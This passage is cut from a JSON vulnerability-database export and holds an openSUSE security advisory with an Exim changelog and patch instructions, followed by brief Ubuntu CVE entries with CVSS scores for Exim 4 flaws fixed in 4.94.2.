Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n update to exim 4.94\n\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. 
Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utilities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - don't create logfiles during install\n * fixes CVE-2020-8015 (boo#1154183)\n\n - add a spec-file workaround for boo#1160726\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no longer accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line recipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, when due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. 
Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utilities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficiency of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). 
The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector is set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attempted). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver now provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. 
(This seems to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. 
This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". 
Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. 
Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. 
This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. 
Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currently use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. 
Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP1:\n\n zypper in -t patch openSUSE-2021-753=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", 
"CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2020-8015"], "modified": "2021-05-20T00:00:00", "id": "OPENSUSE-SU-2021:0753-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/UMX36VOLIS2TDKA3MXOUO365NDUK5WQ3/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:41:57", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n\n exim was updated to fix a security issue.\n\n - CVE-2019-10149: Fixed a Remote Command Execution in exim (bsc#1136587)\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1524=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1524=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-07T00:00:00", "type": "suse", "title": "Security update exim (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "id": "OPENSUSE-SU-2019:1524-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/MSHI6H5JMKAAO5PV4XT32SOANX5LGJM2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-08-09T16:53:32", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An\nauthenticated remote SMTP client can insert newline characters into a spool\nfile (which indirectly leads to remote code execution as root) via AUTH= in\na MAIL FROM command.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | fix is same as CVE-2020-28015\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, 
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015", "CVE-2020-28021"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28021", "href": "https://ubuntu.com/security/CVE-2020-28021", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:14", "description": "Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in\nreceive_add_recipient via an e-mail message with fifty million recipients.\nNOTE: remote exploitation may be difficult because of resource consumption.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28017", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28017"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28017", "href": "https://ubuntu.com/security/CVE-2020-28017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T13:45:59", "description": "Exim 4 
before 4.94.2 has Improper Initialization that can lead to\nrecursion-based stack consumption or other consequences. This occurs\nbecause use of certain getc functions is mishandled when a client uses BDAT\ninstead of DATA.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | trusty/xenial ESM not affected. vulnerability was introduced by: https://git.exim.org/exim.git/patch/7e3ce68e68ab9b8906a637d352993abf361554e2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28019", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28019"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28019", "href": "https://ubuntu.com/security/CVE-2020-28019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T13:46:00", "description": "Exim 4 before 4.94.2 allows an off-by-two Out-of-bounds Write because \"-F\n''\" is mishandled by parse_fix_phrase.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28016", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28016"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28016", "href": "https://ubuntu.com/security/CVE-2020-28016", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:44", "description": "Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. 
Because\nExim operates as root in the spool directory (owned by a non-root user), an\nattacker can write to a /var/spool/exim4/input spool header file, in which\na crafted recipient address can indirectly lead to command execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28008", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28008"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28008", "href": "https://ubuntu.com/security/CVE-2020-28008", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:51:58", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters,\nrelevant in non-default configurations that enable Delivery Status\nNotification (DSN). 
Certain uses of ORCPT= can place a newline into a spool\nheader file, and indirectly allow unauthenticated remote attackers to\nexecute arbitrary commands as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28026", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28026"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28026", "href": "https://ubuntu.com/security/CVE-2020-28026", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-09T16:52:22", "description": "Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. 
Local\nusers can alter the behavior of root processes because a recipient address\ncan have a newline character.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28015", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28015"], "modified": "2021-05-04T00:00:00", "id": "UB:CVE-2020-28015", "href": "https://ubuntu.com/security/CVE-2020-28015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T13:46:01", "description": "Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function,\nwhile setuid root, copies the current working directory pathname into a\nbuffer that is too small (on some common platforms).\n\n#### Notes\n\nAuthor| Note \n---|--- \n[leosilva](<https://launchpad.net/~leosilva>) | code introduced later, xenial and trusty ESM not affected\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
